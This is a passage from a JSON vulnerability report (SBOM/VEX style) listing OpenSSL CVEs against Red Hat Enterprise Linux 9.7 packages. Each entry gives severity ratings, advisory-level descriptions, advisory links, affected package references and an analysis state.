          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-28386",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: Applications using AES-CFB128 encryption or decryption on\nsystems with AVX-512 and VAES support can trigger an out-of-bounds read\nof up to 15 bytes when processing partial cipher blocks.\n\nImpact summary: This out-of-bounds read may trigger a crash which leads to\nDenial of Service for an application if the input buffer ends at a memory\npage boundary and the following page is unmapped. There is no information\ndisclosure as the over-read bytes are not written to output.\n\nThe vulnerable code path is only reached when processing partial blocks\n(when a previous call left an incomplete block and the current call provides\nfewer bytes than needed to complete it). Additionally, the input buffer\nmust be positioned at a page boundary with the following page unmapped.\nCFB mode is not used in TLS/DTLS protocols, which use CBC, GCM, CCM, or\nChaCha20-Poly1305 instead. For these reasons the issue was assessed as\nLow severity according to our Security Policy.\n\nOnly x86-64 systems with AVX-512 and VAES instruction support are affected.\nOther architectures and systems without VAES support use different code\npaths that are not affected.\n\nOpenSSL FIPS module in 3.6 version is affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28386"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28386"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/61f428a2fc6671ede184a19f71e6e495f0689621"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28386"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28386"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-04-24T18:28:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-28387",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        416
      ],
      "description": "Issue summary: An uncommon configuration of clients performing DANE TLSA-based\nserver authentication, when paired with uncommon server DANE TLSA records, may\nresult in a use-after-free and/or double-free on the client side.\n\nImpact summary: A use after free can have a range of potential consequences\nsuch as the corruption of valid data, crashes or execution of arbitrary code.\n\nHowever, the issue only affects clients that make use of TLSA records with both\nthe PKIX-TA(0)/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate\nusage.\n\nBy far the most common deployment of DANE is in SMTP MTAs for which RFC7672\nrecommends that clients treat as 'unusable' any TLSA records that have the PKIX\ncertificate usages.  These SMTP (or other similar) clients are not vulnerable\nto this issue.  Conversely, any clients that support only the PKIX usages, and\nignore the DANE-TA(2) usage are also not vulnerable.\n\nThe client would also need to be communicating with a server that publishes a\nTLSA RRset with both types of TLSA records.\n\nNo FIPS modules are affected by this issue, the problem code is outside the\nFIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28387"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28387"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28387"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28387"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-05-12T13:17:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-28388",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: When a delta CRL that contains a Delta CRL Indicator extension\nis processed, a NULL pointer dereference might happen if the required CRL\nNumber extension is missing.\n\nImpact summary: A NULL pointer dereference can trigger a crash which\nleads to a Denial of Service for an application.\n\nWhen CRL processing and delta CRL processing are enabled during X.509\ncertificate verification, the delta CRL processing does not check\nwhether the CRL Number extension is NULL before dereferencing it.\nWhen a malformed delta CRL file is being processed, this parameter\ncan be NULL, causing a NULL pointer dereference.\n\nExploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in\nthe verification context, the certificate being verified to contain a\nfreshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and\nan attacker to provide a malformed CRL to an application that processes it.\n\nThe vulnerability is limited to Denial of Service and cannot be escalated to\nachieve code execution or memory disclosure. For that reason the issue was\nassessed as Low severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28388"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28388"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28388"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28388"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-05-12T13:17:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-28389",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: During processing of a crafted CMS EnvelopedData message\nwith KeyAgreeRecipientInfo a NULL pointer dereference can happen.\n\nImpact summary: Applications that process attacker-controlled CMS data may\ncrash before authentication or cryptographic operations occur resulting in\nDenial of Service.\n\nWhen a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is\nprocessed, the optional parameters field of KeyEncryptionAlgorithmIdentifier\nis examined without checking for its presence. This results in a NULL\npointer dereference if the field is missing.\n\nApplications and services that call CMS_decrypt() on untrusted input\n(e.g., S/MIME processing or CMS-based protocols) are vulnerable.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28389"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28389"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-7x88-9hgc-69gf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28389"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28389"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-05-12T13:17:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
